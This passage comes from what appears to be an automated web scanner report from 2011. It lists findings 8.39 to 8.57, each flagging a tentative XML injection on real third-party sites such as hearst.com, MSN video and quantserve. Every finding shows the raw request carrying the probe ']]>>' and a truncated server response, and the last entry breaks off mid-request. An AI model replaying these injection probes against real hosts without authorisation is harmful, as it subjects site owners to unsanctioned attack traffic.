Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1229

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.39. http://hearst.com/newspapers/the-advocate.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/the-advocate.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers]]>>/the-advocate.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:03 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.40. http://hearst.com/newspapers/the-advocate.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /newspapers/the-advocate.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /newspapers/the-advocate.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:24:10 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.41. http://hearst.com/press-room/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /press-room/index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /press-room]]>>/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-mark-e-aldam.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:48 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1241

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.42. http://hearst.com/press-room/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /press-room/index.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /press-room/index.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-mark-e-aldam.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:51 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1241

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.43. http://hearst.com/press-room/pr-20110817a.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /press-room/pr-20110817a.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /press-room]]>>/pr-20110817a.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/press-room/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:48 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.44. http://hearst.com/press-room/pr-20110817a.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /press-room/pr-20110817a.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /press-room/pr-20110817a.php]]>> HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/press-room/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:23:52 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1203

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.45. http://img.widgets.video.s-msn.com/resource.aspx [responseEncoding parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://img.widgets.video.s-msn.com
Path:   /resource.aspx

Issue detail

The responseEncoding parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the responseEncoding parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /resource.aspx?resources=player&gmts=gmt&mkt=en-us&configCsid=&configName=&responseEncoding=json]]>>&callbackName=Msn.Video.JavascriptApi.onComplete&cd=1 HTTP/1.1
Host: img.widgets.video.s-msn.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1800
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 10791
Age: 2
Date: Sat, 17 Sep 2011 16:29:17 GMT
Last-Modified: Sat, 17 Sep 2011 16:29:16 GMT
Expires: Sat, 17 Sep 2011 16:59:15 GMT
Connection: keep-alive

...<?xml version="1.0" encoding="utf-8"?><xml><config><gmt><d k="brand" v="MSN" /><d k="subbrand" v="MSN Video" /><d k="msnlinkbackdomainuri" v="" /><d k="leadwithsilverlight" v="false" /><d k="market
...[SNIP]...
8.46. http://js.bizographics.com/show_ad.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://js.bizographics.com
Path:   /show_ad.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /show_ad.js]]>>?partner_id=454 HTTP/1.1
Host: js.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:26:43 GMT
Server: PWS/1.7.3.3
X-Px: ht h0-s1001.p10-sjc.cdngp.net
Cache-Control: max-age=30
Expires: Sat, 17 Sep 2011 16:27:12 GMT
Age: 1
Content-Length: 279
Content-Type: application/xml
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>show_ad.js]]&gt;&gt;</Key><RequestId>A1C2ED3E396AD04E</RequestId><HostId>Ja
...[SNIP]...
8.47. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/OptOut.php?service=checkNAI&nocache=0.5663697 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:45:42 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.48. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load/OptOut.php]]>>?service=checkNAI&nocache=0.5663697 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:45:42 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-5

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.49. http://loadus.exelator.com/load/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw= HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:28:25 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-5

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.50. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://origin.chron.com
Path:   /apps/audit/ads.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /apps]]>>/audit/ads.gif?cider=3;sitepage=Not%20Used;listpos=A234,A300,A728,A88,B300,RM,YTB630,YSM;ref=A120,A728,A234,RM,A951,YSM,A300x60,A300,B300;loc=http://www.stamfordadvocate.com/ HTTP/1.1
Host: origin.chron.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:24:19 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.51. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://origin.chron.com
Path:   /apps/audit/ads.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /apps/audit]]>>/ads.gif?cider=3;sitepage=Not%20Used;listpos=A234,A300,A728,A88,B300,RM,YTB630,YSM;ref=A120,A728,A234,RM,A951,YSM,A300x60,A300,B300;loc=http://www.stamfordadvocate.com/ HTTP/1.1
Host: origin.chron.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:24:22 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.52. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://origin.chron.com
Path:   /apps/audit/ads.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /apps/audit/ads.gif]]>>?cider=3;sitepage=Not%20Used;listpos=A234,A300,A728,A88,B300,RM,YTB630,YSM;ref=A120,A728,A234,RM,A951,YSM,A300x60,A300,B300;loc=http://www.stamfordadvocate.com/ HTTP/1.1
Host: origin.chron.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:24:23 GMT
Server: lighttpd/1.4.28-devel-485M

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.53. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /api]]>>/segments.json?a=p-573scDfDoUH6o&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=ED8BDAHdB7vRkw

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sat, 17 Sep 2011 16:23:12 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.54. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /api/segments.json]]>>?a=p-573scDfDoUH6o&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=ED8BDAHdB7vRkw

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sat, 17 Sep 2011 16:23:12 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.55. http://pixel.quantserve.com/optout_set [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /optout_set]]>>?s=nai&nocache=0.7603821 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EKUBIQHdB4HyBprRW9iB4QochAEA

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sat, 17 Sep 2011 17:19:42 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.56. http://pixel.quantserve.com/optout_status [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_status

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /optout_status]]>>?s=nai&nocache=0.3567882 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=ED8BDAHdB7vRkw

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sat, 17 Sep 2011 16:45:13 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.57. http://pixel.quantserve.com/optout_verify [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_verify

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /optout_verify]]>>?s=nai&nocache=0.7603821 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
